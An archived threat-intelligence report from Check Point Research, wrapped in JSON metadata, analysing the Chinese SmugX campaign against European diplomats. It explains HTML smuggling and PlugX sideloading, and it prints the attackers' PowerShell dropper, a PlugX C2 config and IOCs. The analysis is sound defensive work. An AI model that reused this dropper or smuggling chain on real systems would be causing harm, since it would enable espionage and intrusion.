{
	"id": "44f7d4f3-511d-4a5a-bde3-d09690e5f4a2",
	"created_at": "2026-04-19T02:22:09.688615Z",
	"updated_at": "2026-04-20T02:22:10.995627Z",
	"deleted_at": null,
	"sha1_hash": "43e6900f3abe002005d5c782d1d42bb02fe50265",
	"title": "Chinese Threat Actors Targeting Europe in SmugX Campaign",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 102521,
	"plain_text": "Chinese Threat Actors Targeting Europe in SmugX Campaign\r\nBy etal\r\nPublished: 2023-07-03 · Archived: 2026-04-19 02:00:25 UTC\r\nIntroduction\r\nIn the last couple of months, Check Point Research (CPR) has been tracking the activity of a Chinese threat actor\r\ntargeting Foreign Affairs ministries and embassies in Europe. Combined with other Chinese activity previously\r\nreported by Check Point Research, this represents a larger trend within the Chinese ecosystem, pointing to a shift\r\nto targeting European entities, with a focus on their foreign policy.\r\nThe activity described in this report utilizes HTML Smuggling to target governmental entities in Eastern Europe.\r\nThis specific campaign has been active since at least December 2022, and is likely a direct continuation of a\r\npreviously reported campaign attributed to RedDelta (and also to Mustang Panda, to some extent).\r\nThe campaign uses new delivery methods (most notably HTML Smuggling) to deploy a new variant of PlugX,\r\nan implant commonly associated with a wide variety of Chinese threat actors. Although the payload itself remains\r\nsimilar to the one found in older PlugX variants, its delivery methods result in low detection rates, which until\r\nrecently helped the campaign fly under the radar.\r\nKey findings:\r\nCheck Point Research uncovers a targeted campaign carried out by a Chinese threat actor targeting\r\ngovernment entities in Europe, with a focus on foreign and domestic policy entities.\r\nThe campaign leverages HTML Smuggling, a technique in which attackers hide malicious payloads inside\r\nHTML documents.\r\nFollowing a complex infection chain involving either archives or MSI files, the attacks deploy PlugX, an\r\nimplant commonly associated with Chinese threat actors.\r\nThe campaign, called SmugX, overlaps with previously reported activity by Chinese APT\r\nactors RedDelta and Mustang Panda. 
Although those two correlate to some extent with Camaro Dragon,\r\nthere is insufficient evidence to link the SmugX campaign to the Camaro Dragon group.\r\nHTML Smuggling 101\r\nLet’s start with a short overview of HTML Smuggling, a well-documented technique associated with cyber\r\ncriminals and state-sponsored actors alike. Malicious files are embedded within HTML documents, enabling them\r\nto evade network-based detection measures.\r\nThe way HTML Smuggling is utilized in the SmugX campaign results in the download of either a JavaScript or a\r\nZIP file. Opening those malicious HTML documents results in the following chain of events:\r\n1. The embedded payload within the code is decoded and saved to a JavaScript blob, specifying the\r\nappropriate file type such as application/zip.\r\n2. Instead of using a static HTML \u003ca\u003e element, the JavaScript code creates one dynamically.\r\n3. A URL object is created from the blob using the createObjectURL function.\r\n4. The download attribute is set with the desired filename.\r\n5. Finally, the code invokes the click action, which simulates a user clicking on the link, and initiates the file\r\ndownload.\r\n6. For older browser versions, the code employs msSaveOrOpenBlob to save the blob with the desired\r\nfilename.\r\nFigure 1 – The obfuscated HTML Smuggling implementation.\r\nLures \u0026 Targets\r\nThe lure themes are heavily focused on European domestic and foreign policies and were used to target mostly\r\ngovernmental ministries in Eastern Europe.\r\nFigure 2 – SmugX campaign targets and lures.\r\nThe majority of the documents contained diplomatic-related content. 
In more than one case, the content was\r\ndirectly related to China.\r\nThe lures uploaded to VirusTotal include:\r\nA letter originating from the Serbian embassy in Budapest.\r\nA document stating the priorities of the Swedish Presidency of the Council of the European Union.\r\nAn invitation to a diplomatic conference issued by Hungary’s Ministry of Foreign Affairs.\r\nAn article about two Chinese human rights lawyers sentenced to more than a decade in prison.\r\nIn addition, the names of the archived files themselves strongly suggest that the intended victims were diplomats\r\nand government entities. Here are a few examples of the names we identified:\r\nDraft Prague Process Action Plan_SOM_EN\r\n2262_3_PrepCom_Proposal_next_meeting_26_April\r\nComments FRANCE – EU-CELAC Summit – May 4\r\n202305 Indicative Planning RELEX\r\nChina jails two human rights lawyers for subversion\r\nFigure 3 – Some of the lures used in this campaign.\r\nReconnaissance\r\nDuring our research, we came across a document named China Tries to Block Prominent Uyghur Speaker at\nUN.docx, which was uploaded to VirusTotal. This document employs the remote image technique to access the\nURL https://www.jcswcd[.]com/?wd=cqyahznz, which serves a single-pixel image that is not apparent to the\nuser. This technique, called pixel tracking, is commonly used as a reconnaissance tool. As the remote image is\nrequested, the attackers’ server logs the request, capturing information such as the IP address, user agent, and\nsometimes the time of access. 
By analyzing the collected data, the attackers can gather information about the\nrecipient’s behavior, such as when and where the document was accessed.\nFigure 4 – Reconnaissance file.\nInfection Chains\nFigure 5 – Overview of the PlugX infection chains.\nThere are two main infection chains, both of which originate from an HTML file that saves the second stage to the\nDownload folder according to the victim’s browser settings. The second stage can vary: one chain uses a ZIP\nfile that contains a malicious LNK file, and the other chain utilizes JavaScript to download an MSI file from a\nremote server.\nSmugX Archive Chain\nIn the first scenario, the HTML smuggles a ZIP archive that contains a malicious LNK file that runs PowerShell.\nThe PowerShell extracts a compressed archive embedded within the LNK file and saves it to the %temp% directory.\nThe archive, named tmp.zip or tmp.zip, contains three files:\n1. A legitimate executable used to sideload the payload\n(either robotaskbaricon.exe or passwordgenerator.exe).\n2. The malicious sideloaded DLL RoboForm.dll.\n3. 
The PlugX payload data.dat.\nⓘ The vulnerability in RoboForm was addressed by the company starting with Version 9.3.7 for Windows,\nwhich was released on November 1, 2022.\nThe PowerShell then continues to run the hijacked software, triggering the execution of the PlugX payload stored\nin data.dat.\n$obf_lnkpath = Get-ChildItem *.lnk | where-object {$_.length -eq 00824235} | Select-Object -ExpandProperty FullName;\r\n$obf_file = [system.io.file]::ReadAllBytes($obf_lnkpath);\r\n$obf_path = 'C:\\Users\\User\\AppData\\Local\\Temp\\tmp.zip';\r\n$obf_path = [Environment]::ExpandEnvironmentVariables($obf_path);\r\n$obf_dir = [System.IO.Path]::GetDirectoryName($obf_path);\r\n[System.IO.File]::WriteAllBytes($obf_path, $obf_file[008192..($obf_file.length)]);\r\ncd $obf_dir;\r\nExpand-Archive -Path $obf_path -DestinationPath . -EA SilentlyContinue -Force | Out-Null;\r\nRemove-Item -Path $obf_path -EA SilentlyContinue -Force | Out-Null;\r\n\u0026 .\\passwordgenerator.exe\r\nSmugX JavaScript Chain\r\nThe second scenario utilizes HTML Smuggling to download a JavaScript file. When this file is executed, it\r\ndownloads and executes an MSI file from the attackers’ server. The MSI creates a new folder within\r\nthe %appdata%\\Local directory, in which the three files extracted from the MSI package are stored. The dropped\r\nfiles consist of a hijacked legitimate executable, the loader DLL, and the encrypted payload, as described above.\r\nLoader\r\nAs observed in past instances, PlugX malware employs DLL sideloading techniques. After the LNK or MSI file\r\ndrops the necessary files, it triggers the execution of a legitimate program, which in turn loads the malicious DLL.\r\nThe DLL is responsible for decrypting the final payload, which is often stored in a file named data.dat using\r\nRC4 encryption.\r\nThe decryption process utilizes a hardcoded key that varies across different versions of the malware. 
Once\r\ndecrypted, the payload is loaded into memory for further execution.\r\nFigure 6 – The loader loads and decrypts the payload in memory using the highlighted key.\r\nPlugX Malware\r\nThe final payload is PlugX malware, which has been utilized by multiple Chinese threat actors since 2008. It\r\noperates as a remote access tool (RAT) and employs a modular structure which enables it to accommodate diverse\r\nplugins with distinct functionalities. This enables the attackers to carry out a range of malicious activities on\r\ncompromised systems, including file theft, screen captures, keystroke logging, and command execution.\r\nTo ensure persistence, the PlugX payload copies the legitimate program and the DLL and stores them within a\r\nhidden directory it creates. The encrypted payload is stored in a separate hidden folder. The malware achieves\r\npersistence by adding the legitimate program to the Run registry key.\r\nFigure 7 – RoboForm Update key added for persistence.\r\nSome of the PlugX payloads we found write a deceptive lure in the form of a PDF file to the %temp% directory\r\nand then open it. The document path is stored within the PlugX configuration under document_name. It is worth\r\nmentioning that only a few samples within this campaign included the document_name field; it was missing in the\r\nmajority of the samples.\r\nFollowing the initial execution, which sets the persistence and copies the malware files to its target directories, the\r\nmalware executes itself once again. This time it includes a parameter indicating that it should exclusively carry out\r\ncommunication with the C\u0026C (Command and Control) server. One notable change we saw in this campaign’s\r\nsamples is the increasing use of the RC4 encryption method compared to the simple XOR decryption we have\r\nseen in the past. 
The encrypted config still resides in the data section, but it has the key prepended at the start of\r\nthe config and not in the decryption function like in previous samples.\r\n{\r\n \"str_one\": \"\",\r\n \"str_two\": \"TwGd6YGGI\",\r\n \"campaign_id\": \"test3\",\r\n \"document_name\": \"202305 Indicative Planning RELEX.pdf\",\r\n \"ips\": [\r\n {\r\n \"ip\": \"62.233.57.136\",\r\n \"port\": 443,\r\n \"is_https\": 1\r\n },\r\n {\r\n \"ip\": \"62.233.57.136\",\r\n \"port\": 443,\r\n \"is_https\": 1\r\n },\r\n {\r\n \"ip\": \"62.233.57.136\",\r\n \"port\": 443,\r\n \"is_https\": 1\r\n }\r\n ]\r\n}\r\nDuring the course of investigating the samples, the threat actor dispatched a batch script, sent from the C\u0026C\r\nserver, intended to erase any trace of their activities. 
This script, named del_RoboTask Update.bat, eradicates the\r\nlegitimate executable, the PlugX loader DLL, and the registry key implemented for persistence, and ultimately\r\ndeletes itself. It is likely this is the result of the threat actors becoming aware they were under scrutiny.\r\nAttribution\r\nThis campaign shares significant similarities with activity attributed by other security vendors to either RedDelta\r\nor Mustang Panda (in this context it is worth noting that RedDelta and Mustang Panda are correlated to some\r\nextent, and in some cases are used to describe the same activity):\r\nInfrastructure – During our research, we found a distinctive certificate on the C\u0026C server with the IP\r\naddress 62.233.57[.]136. Notably, the common name within this certificate points to another IP\r\naddress, 45.134.83[.]29, an indicator previously associated with RedDelta.\r\nIt is worth mentioning that the same certificate was referenced in other research about Mustang Panda,\r\nfurther solidifying the link between SmugX and previously observed activities.\r\nFigure 8 – The certificate found on the C\u0026C server.\r\nPaths – Some of the paths used to deploy PlugX are unique and were observed in the campaigns described\r\nabove. The unique paths we observed include:\r\nC:\\Users\\Public\\VirtualFile\r\nC:\\Users\\Public\\SamsungDriver\r\nC:\\Users\\Public\\SecurityScan\r\nTargeting – In addition to technical evidence, the victimology and lure tactics employed in the SmugX\r\ncampaign are highly correlated to those described in RedDelta and Mustang Panda reports by other\r\nvendors.\r\nWe recently published a set of articles about a threat actor we’ve been tracking named Camaro Dragon, whose\r\nactivity overlaps with Mustang Panda and RedDelta. 
However, there is insufficient evidence to link this current\r\ncampaign directly to Camaro Dragon, and we are therefore tracking it as the SmugX campaign.\r\nConclusion\r\nIn this report, we analyzed a recent campaign which correlates to RedDelta activities, and overlaps to some degree\r\nwith Mustang Panda, highlighting their persistent targeting of European government entities. We identified\r\nmultiple infection chains that employ the HTML Smuggling technique which leads to the deployment of the\r\nPlugX payload. The campaign, called SmugX, is part of a larger trend we’re seeing of Chinese threat actors\r\nshifting their focus to Europe.\r\nWhile none of the techniques observed in this campaign is new or unique, the combination of the different tactics,\r\nand the variety of infection chains resulting in low detection rates, enabled the threat actors to stay under the radar\r\nfor quite a while. As for PlugX, it also remained largely unchanged from previous appearances, although one new\r\naspect observed is the adoption of RC4 encryption of the payload, which is a departure from the previously\r\nutilized XOR encryption.\r\nCheck Point Software Customers remain protected against the threat described in\r\nthis research.\r\nCheck Point Threat Emulation and Harmony Endpoint provide comprehensive coverage of attack tactics, file-types, and operating systems and protect against the type of attacks and threats described in this report.\r\nCheck Point Threat Emulation:\r\nAPT.Wins.MustangPanda.AP\r\nHarmony Endpoint:\r\nAPT.Win.PlugX.O\r\nAPT.Win.PlugX.Q\r\nAPT.Win.PlugX.R\r\nIOCs\r\n
Hashes\r\nHTML\r\nedb5d4b454b6c7d3abecd6de7099e05575b8f28bb09dfc364e45ce8c16a34fcd\r\n736451c2593bc1601c52b45c16ad8fd1aec56f868eb3bba333183723dea805af\r\n0e4b81e04ca77762be2afb8bd451abb2ff46d2831028cde1c5d0ec45199f01a1\r\n989ede1df02e4d9620f6caf75a88a11791d156f62fdea4258e12d972df76bc05\r\n10cad59ea2a566597d933b1e8ba929af0b4c7af85481eacaab708ef4ddf6e0ee\r\nc96723a68fc939c835578ff746f7d4c5371cb82a9c0dffe360bb656acea4d6e1\r\n9ce5abd02d397689d99f62dfbd2a6a396876c6629cb5db453f1dcbbc3465ac9a\r\nArchives\r\n5f751fb287db51f79bb6df2e330a53b6d80ef3d2af93f09bb786b62e613514db\r\nbaca1159acc715545a787d522950117eae5b7dc65efacfe86383f62e6b9b59d3\r\n720a70ca6ee1fbaf06c7cb60d14e27391130407e34e13a092d19f1df2c9c6d05\r\n460c459db77c5625ed1c029b2dd6c6eae5e631b81a169494fb0182d550769f76\r\n277390cc50e00f52e76a6562e6e699b0345497bd1df26c7c41bd56da5b6d1347\r\nJavaScripts\r\n3c6ace055527877778d989f469a5a70eb5ef7700375b850f0b1b8414151105ee\r\n27a61653ce4e503334413cf80809647ce5dca02ff4aea63fb3a39bc62c9c258c\r\nce308b538ff3a0be0dbcee753db7e556a54b4aeddbddd0c03db7126b08911fe2\r\nMSI\r\nfd0711a50c8af1dbc5c7ba42b894b2af8a2b03dd7544d20f5a887c93b9834429\r\n3489955d23e66d6f34b3ada70b4d228547dbb3ccb0f6c7282553cbbdeaf168cb\r\n04b99518502774deb4a9d9cf6b54d43ff8f333d8ec5b4b230c0e995542bb2c61\r\nbd3881964e351a7691bfc7e997e8a2c8ce4a8e26b79e3712d0cbdc484a5646b6\r\nea2869424df2ffbb113017d95ae48ae8ed9897280fd21b26e046c75b3e43b25a\r\nRoboForm.dll\r\nb00c252a60171f33e32e64891ffe826b8a45f8816acf778838d788897213a405\r\n2bc30ced135acd6a506cfb557734407f21b70fecd2f645c5b938e14199b24f1e\r\n0d13a503d86a6450f71408eb82a196718324465744bf6b8c4e0a780fd5be40c0\r\n0bdfb922a39103658195d1d37ff584d24f7bd88464e7a119e86d6e3579958cc1\r\na0879dd439c7f1ed520aad0c309fe1dbf1a2fc41e2468f4174489a0ec56c47c7\r\nbddbc529f23ab6b865bc750508403ef57c8cf77284d613d030949bd37078d880\r\n4547914e17c127d9b53bbc9d44de0e5b867f1a86d2e5ede828cd3188ed7fe838\r\n0032d5430f1b5fcfb6a380b4f1d226b6b919f2677340503f04df04235409b2d0\r\nEncrypted 
payload\r\n62c2e246855d589eb1ec37a9f3bcc0b6f3ba9946532aff8a39a4dc9d3a93f42c\r\nf7d35cb95256513c07c262d4b03603e073e58eb4cd5fa9aac1e04ecc6e870d42\r\nbf4f8a5f75e9e5ecd752baa73abddd37b014728722ac3d74b82bffa625bf09b5\r\n8a6ef9aa3f0762b03f983a1e53e8c731247273aafa410ed884ecd4c4e02c7db8\r\nec3e491a831b4057fc0e2ebe9f43c32f1f07959b6430b323d35d6d409d2b31e4\r\nbf8e512921522e49d16c638dc8d01bd0a2803a4ef019afbfc2f0941875019ea1\r\nba55542c6fa12865633d6d24f4a81bffd512791a6e0a9b77f6b17a53e2216659\r\nDecrypted payload\r\n8ea34b85dd4fb64f7e6591e4f1c24763fc3421caa7c0f0d8350c67b9bafa4d32\r\n8cac6dfb2a894ff3f530c29e79dcd37810b4628279b9570a34f7e22bd4d416b3\r\nea5825fa1f39587a88882e87064caae9dd3b79f02438dc3a229c5b775b530c7d\r\n1acb061ce63ee8ee172fbdf518bd261ef2c46d818ffd4b1614db6ce3daa5a885\r\n08661f40f40371fc8a49380ad3d57521f9d0c2aa322ae4b0a684b27e637aed12\r\n324bfb2f414be221e24aaa9fb22cb49e4d4c0904bd7c203afdff158ba63fe35b\r\nIPs \u0026 domains\r\n45.90.58[.]69\r\n62.233.57[.]136\r\n217.12.207[.]164\r\n152.152.12[.]12\r\njcswcd[.]com\r\nnewsmailnet[.]com\r\nPaths\r\nC:\\Users\\\u003cusername\u003e\\VirtualFile\r\nC:\\Users\\Public\\VirtualFile\r\nC:\\Users\\\u003cusername\u003e\\SamsungDriver\r\nC:\\Users\\Public\\SamsungDriver\r\nC:\\Users\\Public\\SecurityScan\r\nSource: https://research.checkpoint.com/2023/chinese-threat-actors-targeting-europe-in-smugx-campaign/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://research.checkpoint.com/2023/chinese-threat-actors-targeting-europe-in-smugx-campaign/"
	],
	"report_names": [
		"chinese-threat-actors-targeting-europe-in-smugx-campaign"
	],
	"threat_actors": [
		{
			"id": "2ff375ef-7859-4d44-9399-06c9d1d9359c",
			"created_at": "2023-07-11T02:00:10.063244Z",
			"updated_at": "2026-04-20T02:00:03.558402Z",
			"deleted_at": null,
			"main_name": "SmugX",
			"aliases": [],
			"source_name": "MISPGALAXY:SmugX",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "aa90ad17-8852-4732-9dba-72ffb64db493",
			"created_at": "2023-07-11T02:00:10.067957Z",
			"updated_at": "2026-04-20T02:00:03.55918Z",
			"deleted_at": null,
			"main_name": "RedDelta",
			"aliases": [],
			"source_name": "MISPGALAXY:RedDelta",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "b69037ec-2605-4de4-bb32-a20d780a8406",
			"created_at": "2023-01-06T13:46:38.790766Z",
			"updated_at": "2026-04-20T02:00:03.31873Z",
			"deleted_at": null,
			"main_name": "MUSTANG PANDA",
			"aliases": [
				"BRONZE PRESIDENT",
				"Red Lich",
				"Earth Preta",
				"Polaris",
				"TANTALUM",
				"Twill Typhoon",
				"HoneyMyte",
				"TEMP.HEX",
				"TA416",
				"Stately Taurus",
				"LuminousMoth"
			],
			"source_name": "MISPGALAXY:MUSTANG PANDA",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "6daadf00-952c-408a-89be-aa490d891743",
			"created_at": "2025-08-07T02:03:24.654882Z",
			"updated_at": "2026-04-20T02:00:04.3921Z",
			"deleted_at": null,
			"main_name": "BRONZE PRESIDENT",
			"aliases": [
				"Aoqin Dragon ",
				"Earth Preta ",
				"HoneyMyte ",
				"Mustang Panda ",
				"Red Delta ",
				"Red Lich ",
				"Stately Taurus ",
				"TA416 ",
				"Temp.Hex ",
				"Twill Typhoon "
			],
			"source_name": "Secureworks:BRONZE PRESIDENT",
			"tools": [
				"BlueShell",
				"China Chopper",
				"Claimloader",
				"Cobalt Strike",
				"HIUPAN",
				"ORat",
				"PTSOCKET",
				"PUBLOAD",
				"PlugX",
				"RCSession",
				"TONESHELL",
				"TinyNote"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "fad89cb7-83e8-4d8c-8cf8-dce2c6e54479",
			"created_at": "2023-10-27T02:00:07.764261Z",
			"updated_at": "2026-04-20T02:00:03.566662Z",
			"deleted_at": null,
			"main_name": "Camaro Dragon",
			"aliases": [],
			"source_name": "MISPGALAXY:Camaro Dragon",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "b5449533-0ff1-4048-999d-7d4bfd8e6da6",
			"created_at": "2022-10-25T16:07:24.114365Z",
			"updated_at": "2026-04-20T02:00:05.782689Z",
			"deleted_at": null,
			"main_name": "RedDelta",
			"aliases": [
				"Operation Dianxun",
				"TA416"
			],
			"source_name": "ETDA:RedDelta",
			"tools": [
				"Agent.dhwf",
				"Agentemis",
				"Chymine",
				"Cobalt Strike",
				"CobaltStrike",
				"Darkmoon",
				"Destroy RAT",
				"DestroyRAT",
				"Gen:Trojan.Heur.PT",
				"Kaba",
				"Korplug",
				"PlugX",
				"Poison Ivy",
				"RedDelta",
				"SPIVY",
				"Sogu",
				"TIGERPLUG",
				"TVT",
				"Thoper",
				"Xamtrav",
				"cobeacon",
				"pivy",
				"poisonivy"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "9baa7519-772a-4862-b412-6f0463691b89",
			"created_at": "2022-10-25T15:50:23.354429Z",
			"updated_at": "2026-04-20T02:00:04.192878Z",
			"deleted_at": null,
			"main_name": "Mustang Panda",
			"aliases": [
				"Mustang Panda",
				"TA416",
				"RedDelta",
				"BRONZE PRESIDENT",
				"STATELY TAURUS",
				"FIREANT",
				"CAMARO DRAGON",
				"EARTH PRETA",
				"HIVE0154",
				"TWILL TYPHOON",
				"TANTALUM",
				"LUMINOUS MOTH",
				"UNC6384",
				"TEMP.Hex",
				"Red Lich"
			],
			"source_name": "MITRE:Mustang Panda",
			"tools": [
				"CANONSTAGER",
				"STATICPLUGIN",
				"ShadowPad",
				"TONESHELL",
				"Cobalt Strike",
				"HIUPAN",
				"Impacket",
				"SplatCloak",
				"PAKLOG",
				"Wevtutil",
				"AdFind",
				"CLAIMLOADER",
				"Mimikatz",
				"PUBLOAD",
				"StarProxy",
				"CorKLOG",
				"RCSession",
				"NBTscan",
				"PoisonIvy",
				"SplatDropper",
				"China Chopper",
				"PlugX"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "2ee03999-5432-4a65-a850-c543b4fefc3d",
			"created_at": "2022-10-25T16:07:23.882813Z",
			"updated_at": "2026-04-20T02:00:05.698663Z",
			"deleted_at": null,
			"main_name": "Mustang Panda",
			"aliases": [
				"Bronze President",
				"Camaro Dragon",
				"Earth Preta",
				"G0129",
				"Hive0154",
				"HoneyMyte",
				"Mustang Panda",
				"Operation SMUGX",
				"Operation SmugX",
				"PKPLUG",
				"Red Lich",
				"Stately Taurus",
				"TEMP.Hex",
				"Twill Typhoon"
			],
			"source_name": "ETDA:Mustang Panda",
			"tools": [
				"9002 RAT",
				"AdFind",
				"Agent.dhwf",
				"Agentemis",
				"CHINACHOPPER",
				"China Chopper",
				"Chymine",
				"ClaimLoader",
				"Cobalt Strike",
				"CobaltStrike",
				"DCSync",
				"DOPLUGS",
				"Darkmoon",
				"Destroy RAT",
				"DestroyRAT",
				"Farseer",
				"Gen:Trojan.Heur.PT",
				"HOMEUNIX",
				"Hdump",
				"HenBox",
				"HidraQ",
				"Hodur",
				"Homux",
				"HopperTick",
				"Hydraq",
				"Impacket",
				"Kaba",
				"Korplug",
				"LadonGo",
				"MQsTTang",
				"McRAT",
				"MdmBot",
				"Mimikatz",
				"NBTscan",
				"NetSess",
				"Netview",
				"Orat",
				"POISONPLUG.SHADOW",
				"PUBLOAD",
				"PVE Find AD Users",
				"PlugX",
				"Poison Ivy",
				"PowerView",
				"QMAGENT",
				"RCSession",
				"RedDelta",
				"Roarur",
				"SPIVY",
				"ShadowPad Winnti",
				"SinoChopper",
				"Sogu",
				"TIGERPLUG",
				"TONEINS",
				"TONESHELL",
				"TVT",
				"TeamViewer",
				"Thoper",
				"TinyNote",
				"WispRider",
				"WmiExec",
				"XShellGhost",
				"Xamtrav",
				"Zupdax",
				"cobeacon",
				"nbtscan",
				"nmap",
				"pivy",
				"poisonivy"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1776565329,
	"ts_updated_at": 1776651730,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/43e6900f3abe002005d5c782d1d42bb02fe50265.pdf",
		"text": "https://archive.orkl.eu/43e6900f3abe002005d5c782d1d42bb02fe50265.txt",
		"img": "https://archive.orkl.eu/43e6900f3abe002005d5c782d1d42bb02fe50265.jpg"
	}
}